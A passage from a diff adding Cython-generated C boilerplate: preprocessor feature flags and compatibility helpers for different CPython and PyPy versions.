#endif + #ifndef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #endif + #ifndef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 1 + #endif + #if PY_MAJOR_VERSION < 3 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #ifndef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 1 + #endif + #ifndef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 1 + #endif + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #if PY_VERSION_HEX < 0x030300F0 || PY_VERSION_HEX >= 0x030B00A2 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #elif !defined(CYTHON_USE_UNICODE_WRITER) + #define CYTHON_USE_UNICODE_WRITER 1 + #endif + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #ifndef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 1 + #endif + #ifndef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL (PY_MAJOR_VERSION < 3 || PY_VERSION_HEX >= 0x03060000 && PY_VERSION_HEX < 0x030C00A6) + #endif + #ifndef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL (PY_VERSION_HEX >= 0x030700A1) + #endif + #ifndef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 1 + #endif + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #endif + #if PY_VERSION_HEX < 0x030400a1 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #elif !defined(CYTHON_USE_TP_FINALIZE) + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #if PY_VERSION_HEX < 0x030600B1 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #elif !defined(CYTHON_USE_DICT_VERSIONS) + #define CYTHON_USE_DICT_VERSIONS (PY_VERSION_HEX < 0x030C00A5) + #endif + #if PY_VERSION_HEX < 0x030700A3 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #elif !defined(CYTHON_USE_EXC_INFO_STACK) + #define CYTHON_USE_EXC_INFO_STACK 1 + #endif + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 1 + #endif +#endif +#if !defined(CYTHON_FAST_PYCCALL) +#define CYTHON_FAST_PYCCALL (CYTHON_FAST_PYCALL && PY_VERSION_HEX >= 0x030600B1) +#endif +#if !defined(CYTHON_VECTORCALL) +#define CYTHON_VECTORCALL (CYTHON_FAST_PYCCALL && PY_VERSION_HEX >= 0x030800B1) +#endif +#define CYTHON_BACKPORT_VECTORCALL (CYTHON_METH_FASTCALL && PY_VERSION_HEX < 0x030800B1) +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_MAJOR_VERSION < 3 + #include "longintrepr.h" + #endif + #undef SHIFT + #undef BASE + #undef MASK + #ifdef SIZEOF_VOID_P + enum { __pyx_check_sizeof_voidp = 1 / (int)(SIZEOF_VOID_P == sizeof(void*)) }; + #endif +#endif +#ifndef __has_attribute + #define __has_attribute(x) 0 +#endif +#ifndef __has_cpp_attribute + #define __has_cpp_attribute(x) 0 +#endif +#ifndef CYTHON_RESTRICT + #if defined(__GNUC__) + #define CYTHON_RESTRICT __restrict__ + #elif defined(_MSC_VER) && _MSC_VER >= 1400 + #define CYTHON_RESTRICT __restrict + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_RESTRICT restrict + #else + #define CYTHON_RESTRICT + #endif +#endif +#ifndef CYTHON_UNUSED + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(maybe_unused) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(maybe_unused) + #define CYTHON_UNUSED [[maybe_unused]] + #endif + #endif + #endif +#endif +#ifndef CYTHON_UNUSED +# if defined(__GNUC__) +# if !(defined(__cplusplus)) || (__GNUC__ > 3 || (__GNUC__ == 3 && __GNUC_MINOR__ >= 4)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +# elif defined(__ICC) || (defined(__INTEL_COMPILER) && !defined(_MSC_VER)) +# define CYTHON_UNUSED __attribute__ ((__unused__)) +# else +# define CYTHON_UNUSED +# endif +#endif +#ifndef CYTHON_UNUSED_VAR +# if defined(__cplusplus) + template void CYTHON_UNUSED_VAR( const T& ) { } +# else +# define CYTHON_UNUSED_VAR(x) (void)(x) +# endif +#endif +#ifndef CYTHON_MAYBE_UNUSED_VAR + #define CYTHON_MAYBE_UNUSED_VAR(x) CYTHON_UNUSED_VAR(x) +#endif +#ifndef CYTHON_NCP_UNUSED +# if CYTHON_COMPILING_IN_CPYTHON +# define CYTHON_NCP_UNUSED +# else +# define CYTHON_NCP_UNUSED CYTHON_UNUSED +# endif +#endif +#define __Pyx_void_to_None(void_result) ((void)(void_result), Py_INCREF(Py_None), Py_None) +#ifdef _MSC_VER + #ifndef _MSC_STDINT_H_ + #if _MSC_VER < 1300 + typedef unsigned char uint8_t; + typedef unsigned short uint16_t; + typedef unsigned int uint32_t; + #else + typedef unsigned __int8 uint8_t; + typedef unsigned __int16 uint16_t; + typedef unsigned __int32 uint32_t; + #endif + #endif + #if _MSC_VER < 1300 + #ifdef _WIN64 + typedef unsigned long long __pyx_uintptr_t; + #else + typedef unsigned int __pyx_uintptr_t; + #endif + #else + #ifdef _WIN64 + typedef unsigned __int64 __pyx_uintptr_t; + #else + typedef unsigned __int32 __pyx_uintptr_t; + #endif + #endif +#else + #include + typedef uintptr_t __pyx_uintptr_t; +#endif +#ifndef CYTHON_FALLTHROUGH + #if defined(__cplusplus) + /* for clang __has_cpp_attribute(fallthrough) is true even before C++17 + * but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] + #endif + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #elif defined(__GNUC__) + #define CYTHON_INLINE __inline__ + #elif defined(_MSC_VER) + #define CYTHON_INLINE __inline + #elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define CYTHON_INLINE inline + #else + #define CYTHON_INLINE + #endif +#endif + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) +#else + #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if (res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) 